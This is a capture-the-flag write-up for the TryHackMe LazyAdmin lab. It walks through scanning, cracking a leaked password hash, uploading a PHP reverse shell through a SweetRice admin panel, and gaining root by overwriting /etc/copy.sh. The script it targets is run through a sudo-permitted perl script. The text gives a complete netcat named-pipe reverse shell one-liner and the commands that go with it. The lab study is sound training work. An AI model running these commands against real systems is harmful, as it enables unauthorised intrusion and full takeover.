TryHackMe: LazyAdmin

3 minute read

Throughout this writeup, I will reference the machine IP address as 10.10.10.10.

Enumeration

I started with a network scan using rustscan. rustscan -a 10.10.10.10 --ulimit 5000 -- -sC -sV runs a rustscan on the specified IP address and then pipes it into nmap using the specified args after the --: in this case version checking and script checking.

With this, there are two open ports on the machine. 22 (ssh) and 80 (http). I started by browsing to the web-page, but it was just the default Apache installation page. So, I then ran feroxbuster to check for any other interesting directories on the server. The only directory found was /content/, with multiple subdirectories: /content/inc, /content/as, /content/attachments, etc. Browsing to http://10.10.10.10/content reveals the website is hosting SweetRice.

The next thing I did was look in the /content/inc directory, as that can usually include core-components to the website, like database logins if not setup properly. I found two interesting files. 1) latest.txt which included just “1.5.1”, which I assume was the SweetRice version. And mysql_backups which had a mySQL backup. First, I looked up SweetRice 1.5.1 vulnerabilities, and found an Arbitrary File Upload. This exploit requires a username and password to use, so let’s find it.

img In the backup file, we can find the username and a hashed password. All we have to do is run the hash through JohnTheRipper or Hashcat and we will crack it.

John: john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt hash Hashcat hashcat -a 0 -m 0 hash /usr/share/wordlists/rockyou.txt

Exploitation

With the username and password, we can now run the exploit. I first started by getting a PHP reverse shell from pentestmonkey and started a listener with ncat -lvnp 8888. I ran python3 exploit.py and gave the username, password, and file to upload, and it said it uploaded successfully. However, when browsing to http://10.10.10.10/content/attachments/rev.php I was given a file not found, so the exploit didn’t seem to be working.

I then went to http://10.10.10.10/content/as and logged in to the administrator account. I did some digging and noticed that you can go to the Ads section and upload code. So, I uploaded the PHP reverse shell and started listening again, and went to http://10.10.10.10/content/ads/rev.php and was given a reverse shell!

A whoami reveals we are www-data, and doing cd /home and then ls shows an itguy home folder. ls itguy will reveal our user.txt which can be accessed via cat user.txt.

Privilege Escalation

We can start with sudo -l to see what all www-data can run as sudo. The only thing is a perl script, backup.pl. We can analyze the backup.pl file with cat and notice it runs a shell command, /etc/copy.sh. We can cat this and see it runs:

1rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.1 5554 >/tmp/f

So, we have a shell reverse-shell that we can access as sudo. We just need to modify the IP address to ours. I first tried using nano, but it wouldn’t work. vim and vi didn’t work either. The only solution I could think of was to overwrite the file with echo: echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 5554 >/tmp/f" > /etc/copy.sh.

Now, we will create another listener with ncat -lvnp 5554 and run sudo /usr/bin/perl /home/itguy/backup.pl which will give us the root shell. We can then cd ~ and cat root.txt to get the flag.